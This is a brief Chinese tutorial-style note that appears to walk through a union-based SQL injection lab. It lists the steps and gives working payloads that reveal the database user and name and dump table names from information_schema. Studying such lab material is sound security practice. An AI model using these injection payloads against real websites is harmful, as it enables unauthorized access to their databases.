0、初始页面

1、确定闭合字符

2、确定列数

3、确定回显位置

4、爆库名
a' union select user(),database() #

5、爆表名
a' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#




a' union select user(),database() #

a' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
346
413
307

被折叠的 条评论
为什么被折叠?